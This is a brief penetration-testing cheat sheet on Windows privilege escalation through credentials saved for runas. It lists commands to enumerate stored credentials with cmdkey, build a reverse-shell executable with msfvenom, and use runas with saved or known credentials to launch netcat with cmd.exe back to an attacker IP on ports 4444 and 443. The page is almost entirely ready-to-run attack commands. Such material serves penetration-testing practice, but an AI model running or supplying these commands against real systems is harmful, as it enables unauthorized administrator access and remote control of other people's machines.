Run As

Runas which allows us to run a program as a different user. Runas can be used with local or domain accounts as long as the user has the ability to log on to the system.

cmdkey /list # List stored Creds on the machine
where runas.exe # If we find or have the password

# Example Stores Creds:
Currently stored credentials:
 Target: Domain:interactive=WORKGROUP\Administrator
 Type: Domain Password
 User: WORKGROUP\Administrator

# Transfer msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

# Using the above Stored Creds:
runas /savecred /user:<USER found from cmdkey command above> "shell.exe" 

# Change path below
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

# If the above doesn't work
runas /user:administrator cmd # Try this or below to get the reverse shell
runas /user:administrator "nc.exe -e cmd.exe <IP> 443"

# If the above doesn't work, try RunasCs

Windows Privilege Escalation - Runas (Stored Credentials) - StefLan's Security BlogStefLan's Security Blog

PreviousPassword loot NextSE Privileges

Last updated 1 year ago